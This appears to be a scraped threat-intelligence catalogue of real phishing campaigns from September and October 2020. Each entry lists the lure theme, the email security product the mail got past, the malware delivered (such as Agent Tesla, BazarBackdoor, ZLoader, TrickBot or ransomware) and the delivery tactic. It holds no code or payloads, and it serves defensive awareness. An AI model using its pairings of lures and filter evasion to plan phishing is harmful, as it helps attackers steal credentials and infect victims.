THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Cisco Ironport deliver Pyrogenic stealer via embedded links. The embedded links download a Pyrogenic stealer binary.

Real Phishing Example: Maersk-spoofing emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded Dropbox links. The embedded links download a RAR archive that contains an Agent Tesla exectuable.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Maersk-spoofing emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded Dropbox links. The embedded links download a RAR archive that contains an Agent Tesla exectuable.

Real Phishing Example: Finance-themed emails were seen within O365-ATP environments delivering Remcos RAT via a GuLoader binary attached in an .xxe archive.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: RAT

POSTED ON: 10/16/2020

TACTIC: XXE Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails were seen within O365-ATP environments delivering Remcos RAT via a GuLoader binary attached in an .xxe archive.

Real Phishing Example: Finance-themed emails were seen within Proofpoint environments delivering Remcos RAT via a GuLoader binary attached in an .xxe archive.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/16/2020

TACTIC: XXE Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails were seen within Proofpoint environments delivering Remcos RAT via a GuLoader binary attached in an .xxe archive.

Real Phishing Example: Finance-themed emails were seen within an O365-ATP environment delivering Agent Tesla Keylogger via embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails were seen within an O365-ATP environment delivering Agent Tesla Keylogger via embedded URLs.

Real Phishing Example: Finance-themed emails in Proofpoint environments to deliver Pyrogenic Stealer via embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Proofpoint environments to deliver Pyrogenic Stealer via embedded URLs.

Real Phishing Example: Finance-themed emails in Proofpoint environemnts to deliver an attached HTML file. When opened, the HTML file drops an archive containing jRAT.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/16/2020

TACTIC: HTM Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Proofpoint environemnts to deliver an attached HTML file. When opened, the HTML file drops an archive containing jRAT.

Real Phishing Example: Finance-themed campaign in O365-ATP environments to deliver FormGrabber via GuLoader which is downloaded via embedded links

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed campaign in O365-ATP environments to deliver FormGrabber via GuLoader which is downloaded via embedded links

Real Phishing Example: Employment termination due to COVID-19 or annual bonus-themed emails in Symantec environments deliver PDF documents via embedded URLs. The PDF documents provided links to download BazarBackdoor.

ENVIRONMENTS: Symantec

TYPE: Trojan

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Employment Termination

PHISHING EXAMPLE DESCRIPTION: Employment termination due to COVID-19 or annual bonus-themed emails in Symantec environments deliver PDF documents via embedded URLs. The PDF documents provided links to download BazarBackdoor.

Real Phishing Example: Employment termination due to COVID-19 or annual bonus-themed emails in O365-ATP environments deliver PDF documents via embedded URLs. The PDF documents provided links to download BazarBackdoor.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Employment Termination

PHISHING EXAMPLE DESCRIPTION: Employment termination due to COVID-19 or annual bonus-themed emails in O365-ATP environments deliver PDF documents via embedded URLs. The PDF documents provided links to download BazarBackdoor.

Real Phishing Example: Employment termination due to COVID-19 or annual bonus-themed emails in Proofpoint environments deliver PDF documents via embedded URLs. The PDF documents provided links to download BazarBackdoor.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Employment Termination

PHISHING EXAMPLE DESCRIPTION: Employment termination due to COVID-19 or annual bonus-themed emails in Proofpoint environments deliver PDF documents via embedded URLs. The PDF documents provided links to download BazarBackdoor.

Real Phishing Example: Attachment-themed emails in Proofpoint environments to deliver NanoCore RAT via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Attachment

PHISHING EXAMPLE DESCRIPTION: Attachment-themed emails in Proofpoint environments to deliver NanoCore RAT via an embedded URL.

Real Phishing Example: Purchase Order-themed email in Proofpoint environments to deliver Credential Phishing via attached HTM files. The attached HTM files harvest Adobe login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/16/2020

TACTIC: HTM Attachment

THEME: Purchase Order

PHISHING EXAMPLE DESCRIPTION: Purchase Order-themed email in Proofpoint environments to deliver Credential Phishing via attached HTM files. The attached HTM files harvest Adobe login credentials.

Real Phishing Example: Legal Action-themed emails in Proofpoint environments to deliver Remcos RAT via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Legal

PHISHING EXAMPLE DESCRIPTION: Legal Action-themed emails in Proofpoint environments to deliver Remcos RAT via an embedded URL.

Real Phishing Example: Insider details-themed emails in Proofpoint environments to deliver ZLoader via an Office macro laden spreadsheet downloaded from an embedded URL

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Insider

PHISHING EXAMPLE DESCRIPTION: Insider details-themed emails in Proofpoint environments to deliver ZLoader via an Office macro laden spreadsheet downloaded from an embedded URL

Real Phishing Example: Order-themed emails in Proofpoint environments to deliver AZORult Stealer via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Order

PHISHING EXAMPLE DESCRIPTION: Order-themed emails in Proofpoint environments to deliver AZORult Stealer via an embedded URL.

Real Phishing Example: Order-themed emails in Proofpoint environments to deliver Quaverse Remote Access Trojan

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/09/2020

TACTIC: JAR Attachment

PHISHING EXAMPLE DESCRIPTION: Order-themed emails in Proofpoint environments to deliver Quaverse Remote Access Trojan

Real Phishing Example: Information-themed emails in O365-ATP environments to deliver BazarBackdoor via embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Information

PHISHING EXAMPLE DESCRIPTION: Information-themed emails in O365-ATP environments to deliver BazarBackdoor via embedded URLs.

Real Phishing Example: Information-themed emails in  Mimecast environments to deliver BazarBackdoor via embedded URLs.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Information

PHISHING EXAMPLE DESCRIPTION: Information-themed emails in Mimecast environments to deliver BazarBackdoor via embedded URLs.

Real Phishing Example: Information-themed emails in Proofpoint environments to deliver BazarBackdoor via embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Information

PHISHING EXAMPLE DESCRIPTION: Information-themed emails in Proofpoint environments to deliver BazarBackdoor via embedded URLs.

Real Phishing Example: Information-themed emails in TrendMicro environments to deliver BazarBackdoor via embedded URLs.

ENVIRONMENTS: TrendMicro

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Information

PHISHING EXAMPLE DESCRIPTION: Information-themed emails in TrendMicro environments to deliver BazarBackdoor via embedded URLs.

Real Phishing Example: Information-themed emails in Ironport environments to deliver BazarBackdoor via embedded URLs.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Information

PHISHING EXAMPLE DESCRIPTION: Information-themed emails in Ironport environments to deliver BazarBackdoor via embedded URLs.

Real Phishing Example: Finance-themed emails in O365-ATP environments to deliver Mispadu banking trojan via embedded URLs. Note: These are in Spanish

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in O365-ATP environments to deliver Mispadu banking trojan via embedded URLs. Note: These are in Spanish

Real Phishing Example: Finance-themed emails in Proofpoint environments to deliver Agent Tesla Keylogger via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Proofpoint environments to deliver Agent Tesla Keylogger via an embedded URL.

Real Phishing Example: Finance-themed emails in O365-ATP environments to deliver ZLoader via a VBS downloader dropped by an Office macro laden spreadsheet.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: XLS Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in O365-ATP environments to deliver ZLoader via a VBS downloader dropped by an Office macro laden spreadsheet.

Real Phishing Example: Coronavirus-themed emails in Symantec environments to deliver BazarBackdoor and ZLoader via embedded URLs. The embedded URLs download Office macros that download and run a BazarBackdoor or ZLoader binary.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Coronavirus

PHISHING EXAMPLE DESCRIPTION: Coronavirus-themed emails in Symantec environments to deliver BazarBackdoor and ZLoader via embedded URLs. The embedded URLs download Office macros that download and run a BazarBackdoor or ZLoader binary.

Real Phishing Example: Eunmin-spoofing emails in Proofpoint environments to deliver NetWire RAT via GuLoader. GuLoader is downloaded from an embedded link.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Eunmin-spoofing emails in Proofpoint environments to deliver NetWire RAT via GuLoader. GuLoader is downloaded from an embedded link.

Real Phishing Example: Political-themed emails in Symantec ebvironments to deliver BazarBackdoor and ZLoader via embedded URLs. The embedded URLs download Office macros that download and run a BazarBackdoor or ZLoader binary.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Political

PHISHING EXAMPLE DESCRIPTION: Political-themed emails in Symantec ebvironments to deliver BazarBackdoor and ZLoader via embedded URLs. The embedded URLs download Office macros that download and run a BazarBackdoor or ZLoader binary.

Real Phishing Example: Employee termination-themed emails in Symantec environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Employee

PHISHING EXAMPLE DESCRIPTION: Employee termination-themed emails in Symantec environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

Real Phishing Example: SAS International Marine Services-spoofing emails found in Cisco Ironport environments to deliver Mass Logger

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: Attachment EXE

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: SAS International Marine Services-spoofing emails found in Cisco Ironport environments to deliver Mass Logger

Real Phishing Example: DHL-spoofing campaign in Microsoft ATP environments to deliver attached HTML files. The HTML files harvest email login credentials.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: HTML Attachment

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: DHL-spoofing campaign in Microsoft ATP environments to deliver attached HTML files. The HTML files harvest email login credentials.

Real Phishing Example: Employee termination-themed emails in O365-ATP environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Employee

PHISHING EXAMPLE DESCRIPTION: Employee termination-themed emails in O365-ATP environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

Real Phishing Example: Finance-themed emails in Mimecast environments to deliver NetWire RAT via embedded URLs.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Payment

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Mimecast environments to deliver NetWire RAT via embedded URLs.

Real Phishing Example: HSBC-spoofing emails in Ironport environments to deliver Agent Tesla keylogger via embedded Ondrive URLs. The Onedrive URLs download a .ZIP archive that contains an Agent Tesla executable.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: HSBC-spoofing emails in Ironport environments to deliver Agent Tesla keylogger via embedded Ondrive URLs. The Onedrive URLs download a .ZIP archive that contains an Agent Tesla executable.

Real Phishing Example: Employee termination-themed emails in Mimecast environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Employee

PHISHING EXAMPLE DESCRIPTION: Employee termination-themed emails in Mimecast environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

Real Phishing Example: Finance-themed emails in Proofpoint environments to deliver Credential phishig via embedded Onedrive URLs. The Onedrive URLs contain a Onenote that redirects to a phishing URL. The phishing URL harvests multiple email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Proofpoint environments to deliver Credential phishig via embedded Onedrive URLs. The Onedrive URLs contain a Onenote that redirects to a phishing URL. The phishing URL harvests multiple email login credentials.

Real Phishing Example: Finance-themed emails in Proofpoint environments to deliver ZLoader via a VBS downloader dropped by an Office macro laden spreadsheet. The spreadsheet is downloaded from an embedded link.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Proofpoint environments to deliver ZLoader via a VBS downloader dropped by an Office macro laden spreadsheet. The spreadsheet is downloaded from an embedded link.

Real Phishing Example: Employee termination-themed emails in Proofpoint environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Employee

PHISHING EXAMPLE DESCRIPTION: Employee termination-themed emails in Proofpoint environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

Real Phishing Example: Confirmation-themed emails spoof Salesforce found in Proofpoint environments to deliver Credential Phishing via embedded URLs. This campaign has been seen targeting across multiple sectors.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Confirmation

PHISHING EXAMPLE DESCRIPTION: Confirmation-themed emails spoof Salesforce found in Proofpoint environments to deliver Credential Phishing via embedded URLs. This campaign has been seen targeting across multiple sectors.

Real Phishing Example: Finance-themed emails in Microsoft ATP environments to deliver ZLoader via a VBS downloader dropped by an Office macro laden spreadsheet. The spreadsheet is downloaded from an embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Microsoft ATP environments to deliver ZLoader via a VBS downloader dropped by an Office macro laden spreadsheet. The spreadsheet is downloaded from an embedded link.

Real Phishing Example: Employee termination-themed emails in TrendMicro environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

ENVIRONMENTS: TrendMicro

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Employee

PHISHING EXAMPLE DESCRIPTION: Employee termination-themed emails in TrendMicro environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

Real Phishing Example: Confirmation-themed emails spoof Salesforce found in Proofpoint environments and O365-ATP to deliver Credential Phishing via embedded URLs. This campaign has been seen target

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Confirmation

PHISHING EXAMPLE DESCRIPTION: Confirmation-themed emails spoof Salesforce found in Proofpoint environments and O365-ATP to deliver Credential Phishing via embedded URLs. This campaign has been seen target

Real Phishing Example: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Mimecast environments to deliver Buer Loader via an embedded URL.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Mimecast environments to deliver Buer Loader via an embedded URL.

Real Phishing Example: Finance-themed email in Proofpoint environments to deliver Agent Tesla Keylogger via a CVE-2017-0199 to CVE-2017-11882 download chain.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: XLS Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed email in Proofpoint environments to deliver Agent Tesla Keylogger via a CVE-2017-0199 to CVE-2017-11882 download chain.

Real Phishing Example: North Country HealthCare-spoofing emails in Proofpoint environments to deliver Credential Phishing via embedded URLs. The embedded URLs redirect to a phishing URL that harvests email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Health

PHISHING EXAMPLE DESCRIPTION: North Country HealthCare-spoofing emails in Proofpoint environments to deliver Credential Phishing via embedded URLs. The embedded URLs redirect to a phishing URL that harvests email login credentials.

Real Phishing Example: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Proofpoint environments to deliver Buer Loader via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Proofpoint environments to deliver Buer Loader via an embedded URL.

Real Phishing Example: Hamahang Daryaye Pars-spoofing emails in Ironport environments to deliver Mass Logger.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: EXE Attachment

THEME: Confirmation

PHISHING EXAMPLE DESCRIPTION: Hamahang Daryaye Pars-spoofing emails in Ironport environments to deliver Mass Logger.

Real Phishing Example: North Country HealthCare-spoofing emails in Mimecast environments to deliver Credential Phishing via embedded URLs. The embedded URLs redirect to a phishing URL that harvests email login credentials.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Health

PHISHING EXAMPLE DESCRIPTION: North Country HealthCare-spoofing emails in Mimecast environments to deliver Credential Phishing via embedded URLs. The embedded URLs redirect to a phishing URL that harvests email login credentials.

Real Phishing Example: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Symantec environments to deliver Buer Loader via an embedded URL.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Symantec environments to deliver Buer Loader via an embedded URL.

Real Phishing Example: SNCF-spoofing emails in Proofpoint environments to deliver JavaScript files via embedded URLs. The JavaScript files drop and run MoDi RAT.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Confirmation

PHISHING EXAMPLE DESCRIPTION: SNCF-spoofing emails in Proofpoint environments to deliver JavaScript files via embedded URLs. The JavaScript files drop and run MoDi RAT.

Real Phishing Example: Citi-spoofing emails in Symantec environments to deliver STR RAT and Quaverse Remote Access Trojan via embedded URLs. The embedded URLs download a ZIP archive containing two JAR files, one for each RAT.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Citi

PHISHING EXAMPLE DESCRIPTION: Citi-spoofing emails in Symantec environments to deliver STR RAT and Quaverse Remote Access Trojan via embedded URLs. The embedded URLs download a ZIP archive containing two JAR files, one for each RAT.

Real Phishing Example: Fidelity-spoofing emails in Symantec environments to deliver credential phishing via an embedded link.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Fidelity-spoofing emails in Symantec environments to deliver credential phishing via an embedded link.

Real Phishing Example: Microsoft-spoofing emails in Proofpoint environments to deliver Credential Phishing via embedded URLs. The embedded URLs harvest Microsoft email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Microsoft

PHISHING EXAMPLE DESCRIPTION: Microsoft-spoofing emails in Proofpoint environments to deliver Credential Phishing via embedded URLs. The embedded URLs harvest Microsoft email login credentials.

Real Phishing Example: Response-themed emails in O365-ATP environments to deliver QakBot via Office macros.
Note: the original email content was removed for this image.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: XLS Attachment

THEME: Response

PHISHING EXAMPLE DESCRIPTION: Response-themed emails in O365-ATP environments to deliver QakBot via Office macros. Note: the original email content was removed for this image.

Real Phishing Example: This purchase order-themed phish delivers a link that leads to a NanoCore Remote Access Trojan installer.

ENVIRONMENTS: Proofpoint

TYPE: NanoCore

POSTED ON: 09/17/2020

TACTIC: Link

THEME: Purchase Order

PHISHING EXAMPLE DESCRIPTION: This purchase order-themed phish delivers a link that leads to a NanoCore Remote Access Trojan installer.

Real Phishing Example: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

ENVIRONMENTS: Proofpoint

TYPE: TrickBot

POSTED ON: 09/15/2020

TACTIC: Attachment-DOC

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

Real Phishing Example: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

ENVIRONMENTS: Ironport

TYPE: TrickBot

POSTED ON: 09/15/2020

TACTIC: Attachment-DOC

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

Real Phishing Example: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

ENVIRONMENTS: Mimecast

TYPE: TrickBot

POSTED ON: 09/15/2020

TACTIC: Attachment-DOC

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

Real Phishing Example: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

ENVIRONMENTS: Symantec

TYPE: Hentai OniChan Ransomware

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

Real Phishing Example: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

ENVIRONMENTS: Ironport

TYPE: Hentai OniChan Ransomware

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

Real Phishing Example: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Hentai OniChan Ransomware

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

Real Phishing Example: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

ENVIRONMENTS: Proofpoint

TYPE: Reconnaissance

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Illness

PHISHING EXAMPLE DESCRIPTION: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

Real Phishing Example: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

ENVIRONMENTS: Symantec

TYPE: Reconnaissance

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Illness

PHISHING EXAMPLE DESCRIPTION: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

Real Phishing Example: This BEC uses a task theme to lure the recipient into responding to execute the attack.

ENVIRONMENTS: Ironport

TYPE: BEC

POSTED ON: 09/14/2020

TACTIC: BEC

THEME: Task

PHISHING EXAMPLE DESCRIPTION: This BEC uses a task theme to lure the recipient into responding to execute the attack.

Real Phishing Example: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

ENVIRONMENTS: Mimecast

TYPE: Reconnaissance

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Illness

PHISHING EXAMPLE DESCRIPTION: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

Real Phishing Example: This email uses a business proposal theme with embedded links that lead to a credential harvesting site.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Proposal

PHISHING EXAMPLE DESCRIPTION: This email uses a business proposal theme with embedded links that lead to a credential harvesting site.

Real Phishing Example: This fax-themed phish delivers links to a credential harvesting website.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Fax

PHISHING EXAMPLE DESCRIPTION: This fax-themed phish delivers links to a credential harvesting website.

Real Phishing Example: This BEC lures the recipient into providing sensitive tax information.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: BEC

POSTED ON: 09/14/2020

TACTIC: BEC

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: This BEC lures the recipient into providing sensitive tax information.

Real Phishing Example: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

ENVIRONMENTS: Proofpoint

TYPE: Hentai OniChan Ransomware

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

Real Phishing Example: Using a document theme, this  attack uses Microsoft OneDrive links to host credential stealing web pages.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 09/11/2020

TACTIC: Link

THEME: Document

PHISHING EXAMPLE DESCRIPTION: Using a document theme, this attack uses Microsoft OneDrive links to host credential stealing web pages.

Learn More
Real Phishing Example: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

ENVIRONMENTS: Proofpoint

TYPE: Reconnaissance

POSTED ON: 09/11/2020

TACTIC: Attachment-HTML

THEME: Bonus

PHISHING EXAMPLE DESCRIPTION: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

Real Phishing Example: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

ENVIRONMENTS: Mimecast

TYPE: Reconnaissance

POSTED ON: 09/11/2020

TACTIC: Attachment-HTML

THEME: Bonus

PHISHING EXAMPLE DESCRIPTION: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

Real Phishing Example: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Reconnaissance

POSTED ON: 09/11/2020

TACTIC: Attachment-HTML

THEME: Bonus

PHISHING EXAMPLE DESCRIPTION: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

Real Phishing Example: This BEC attack uses gift cards to extract money from the recipient.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: BEC

POSTED ON: 09/11/2020

TACTIC: BEC

THEME: Gift Card

PHISHING EXAMPLE DESCRIPTION: This BEC attack uses gift cards to extract money from the recipient.

Real Phishing Example: This task-themed BEC uses a funeral as the lure to get the recipient to respond.

ENVIRONMENTS: Symantec

TYPE: BEC

POSTED ON: 09/11/2020

TACTIC: BEC

THEME: Task

PHISHING EXAMPLE DESCRIPTION: This task-themed BEC uses a funeral as the lure to get the recipient to respond.

Real Phishing Example: This phish uses a project theme to lure the recipient into accessing a macro-laden Microsoft Office spreadsheet to deliver TrickBot first and then BazarBackdoor.

ENVIRONMENTS: Proofpoint

TYPE: TrickBot

POSTED ON: 09/11/2020

TACTIC: Attachment-XLS

THEME: Project

PHISHING EXAMPLE DESCRIPTION: This phish uses a project theme to lure the recipient into accessing a macro-laden Microsoft Office spreadsheet to deliver TrickBot first and then BazarBackdoor.

Real Phishing Example: This task-themed BEC lures the recipient into responding.

ENVIRONMENTS: Mimecast

TYPE: BEC

POSTED ON: 09/10/2020

TACTIC: BEC

THEME: Task

PHISHING EXAMPLE DESCRIPTION: This task-themed BEC lures the recipient into responding.

Real Phishing Example: This invoice-themed attack delivers a link to Google Drive that will download a VBS Loader to install the WSH Remote Access Trojan.

ENVIRONMENTS: Proofpoint

TYPE: WSH RAT

POSTED ON: 09/10/2020

TACTIC: Link

THEME: Invoice

